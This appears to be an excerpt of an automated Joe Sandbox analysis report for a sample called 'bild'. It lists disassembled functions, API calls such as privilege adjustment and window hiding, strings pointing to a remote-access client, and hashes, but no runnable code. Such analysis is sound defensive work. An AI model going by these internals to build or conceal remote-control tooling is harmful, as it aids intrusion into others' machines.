                                                                                      control_flow_graph 1646 11143570-111435b1 GetModuleFileNameA 1647 111435f3 1646->1647 1648 111435b3-111435c6 call 11081b40 1646->1648 1650 111435f9-111435fd 1647->1650 1648->1647 1656 111435c8-111435f1 LoadLibraryA 1648->1656 1652 111435ff-1114360c LoadLibraryA 1650->1652 1653 11143619-11143637 GetModuleHandleA GetProcAddress 1650->1653 1652->1653 1657 1114360e-11143616 LoadLibraryA 1652->1657 1654 11143647-11143670 GetProcAddress * 4 1653->1654 1655 11143639-11143645 1653->1655 1658 11143673-111436eb GetProcAddress * 10 call 11161d01 1654->1658 1655->1658 1656->1650 1657->1653 1660 111436f0-111436f3 1658->1660
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                      • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                      • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                      • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                      • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                      • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                      • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                      • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                      • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                      • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                      • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                      • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                      • API String ID: 3874234733-2061581830
                                                                                      • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                      • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
                                                                                      Function 11139090 Relevance: 56.5, APIs: 20, Strings: 12, Instructions: 474windowthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1661 11139090-111390c5 1662 111390d2-111390d9 1661->1662 1663 111390c7-111390cd GetCurrentThreadId 1661->1663 1664 111390e0-111390fc call 11133920 call 11133400 1662->1664 1665 111390db call 11029330 1662->1665 1663->1662 1671 11139102-11139108 1664->1671 1672 111391db-111391e2 1664->1672 1665->1664 1675 1113975a-11139775 call 11161d01 1671->1675 1676 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 1671->1676 1673 1113929a-111392b0 1672->1673 1674 111391e8-111391ef 1672->1674 1686 111392b6-111392bd 1673->1686 1687 111393ef 1673->1687 1674->1673 1678 111391f5-111391fc 1674->1678 1708 111391d1 1676->1708 1709 11139171-11139177 1676->1709 1678->1673 1681 11139202-11139211 FindWindowA 1678->1681 1681->1673 1685 11139217-1113921c IsWindowVisible 1681->1685 1685->1673 1689 1113921e-11139225 1685->1689 1690 111392bf-111392c9 1686->1690 1691 111392ce-111392ee call 1105dd10 1686->1691 1692 111393f1-11139402 1687->1692 1693 11139435-11139440 1687->1693 1689->1673 1697 11139227-1113924c call 11138c30 IsWindowVisible 1689->1697 1690->1693 1691->1693 1714 111392f4-11139323 1691->1714 1699 11139404-11139414 1692->1699 1700 1113941a-1113942f 1692->1700 1694 11139442-11139462 call 1105dd10 1693->1694 1695 11139476-1113947c 1693->1695 1716 11139470 1694->1716 1717 11139464-1113946e call 1102cff0 1694->1717 1703 1113947e-1113948a call 11138c30 1695->1703 1704 1113948d-11139495 1695->1704 1697->1673 1720 1113924e-1113925d IsIconic 1697->1720 1699->1700 1700->1693 1703->1704 1712 111394a7-111394b2 call 1112ce90 1704->1712 1713 11139497-111394a2 call 1106b860 1704->1713 1708->1672 1709->1708 1718 11139179-11139190 call 11146450 GetForegroundWindow 1709->1718 1730 111394b4-111394ba call 11131b00 1712->1730 1731 111394bd-111394c6 1712->1731 1713->1712 1728 11139325-11139339 call 11081a70 1714->1728 1729 1113933e-11139351 call 11143230 1714->1729 1716->1695 1717->1695 1740 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 1718->1740 1741 111391be-111391c0 1718->1741 1720->1673 1726 1113925f-1113927a GetForegroundWindow call 11131210 * 2 1720->1726 1762 1113928b-11139294 EnableWindow 1726->1762 1763 1113927c-11139282 1726->1763 1728->1729 1754 1113933b 1728->1754 1755 11139353-11139364 GetLastError call 11146450 1729->1755 1756 1113936e-11139375 1729->1756 1730->1731 1738 111394d4 call 111317a0 1731->1738 1739 111394c8-111394cb 1731->1739 1748 111394d9-111394df 1738->1748 1739->1748 1749 111394cd-111394d2 call 11131870 1739->1749 1740->1741 1741->1708 1743 111391c2-111391c8 1741->1743 1743->1708 1752 111391ca-111391cb SetForegroundWindow 1743->1752 1758 111394e5-111394eb 1748->1758 1759 111395e9-111395f4 call 111386b0 1748->1759 1749->1748 1752->1708 1754->1729 1755->1756 1766 11139377-11139392 1756->1766 1767 111393e8 1756->1767 1768 111394f1-111394f9 1758->1768 1769 1113959b-111395a3 1758->1769 1777 111395f6-11139608 call 110637c0 1759->1777 1778 11139615-1113961b 1759->1778 1762->1673 1763->1762 1772 11139284-11139285 SetForegroundWindow 1763->1772 1780 11139395-111393a1 1766->1780 1767->1687 1768->1759 1775 111394ff-11139505 1768->1775 1769->1759 1773 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 1769->1773 1772->1762 1773->1759 1775->1759 1781 1113950b-11139522 call 1110f420 1775->1781 1777->1778 1799 1113960a-11139610 call 11142210 1777->1799 1785 11139621-11139628 1778->1785 1786 1113974a-11139752 1778->1786 1787 111393a3-111393b7 call 11081a70 1780->1787 1788 111393bc-111393c9 call 11143230 1780->1788 1796 11139544 1781->1796 1797 11139524-11139542 call 110573b0 1781->1797 1785->1786 1793 1113962e-11139647 call 1105dd10 1785->1793 1786->1675 1787->1788 1802 111393b9 1787->1802 1788->1767 1804 111393cb-111393e6 GetLastError call 11146450 1788->1804 1793->1786 1813 1113964d-11139660 1793->1813 1805 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 1796->1805 1797->1805 1799->1778 1802->1788 1804->1693 1805->1759 1840 11139594-11139599 call 110ebf30 1805->1840 1820 11139662-11139668 1813->1820 1821 1113968d-11139693 1813->1821 1824 1113966a-11139688 call 11146450 GetTickCount 1820->1824 1825 11139699-111396a5 GetTickCount 1820->1825 1821->1786 1821->1825 1824->1786 1825->1786 1829 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 1825->1829 1847 111396f0-111396f5 1829->1847 1840->1759 1847->1847 1848 111396f7-111396fd 1847->1848 1849 11139700-11139705 1848->1849 1849->1849 1850 11139707-11139731 call 1112c7a0 1849->1850 1853 11139733-11139734 FreeLibrary 1850->1853 1854 1113973a-11139747 call 111618c1 1850->1854 1853->1854 1854->1786
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                      • IsWindow.USER32(0002046E), ref: 11139125
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139133
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 1113916B
                                                                                      • GetForegroundWindow.USER32 ref: 11139186
                                                                                      • EnableWindow.USER32(0002046E,00000000), ref: 111391A0
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 111391BC
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                      • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                      • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139248
                                                                                      • IsIconic.USER32(0002046E), ref: 11139255
                                                                                      • GetForegroundWindow.USER32 ref: 1113925F
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(0002046E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(0002046E,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 11139294
                                                                                      • GetLastError.KERNEL32 ref: 11139353
                                                                                      • GetLastError.KERNEL32 ref: 111393CB
                                                                                      • GetTickCount.KERNEL32 ref: 11139678
                                                                                      • GetTickCount.KERNEL32 ref: 11139699
                                                                                        • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                      • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                      • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin$
                                                                                      • API String ID: 2511061093-1914206996
                                                                                      • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                      • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                      Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                      • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                      • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                      • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                      • String ID: SHELL32.DLL$SHGetSettings
                                                                                      • API String ID: 4195908086-2348320231
                                                                                      • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                      • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                      Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: NBCTL32.DLL$_License$serial_no
                                                                                      • API String ID: 2102423945-35127696
                                                                                      • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                      • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                      • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                      • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                      Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID: Client32$NSMWClass$NSMWClass
                                                                                      • API String ID: 3192549508-611217420
                                                                                      • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                      • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                      • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                      • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                      Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                      • EqualSid.ADVAPI32(?,00F5DEA0,?,00000001,00000001), ref: 1109E9A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken$AllocateEqualInitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1878589025-0
                                                                                      • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                      • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                      • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                      • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                      Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109D46D
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                      • String ID:
                                                                                      • API String ID: 2349140579-0
                                                                                      • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                      • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                      • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                      • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                      Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                      • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                      Memory Dump Source
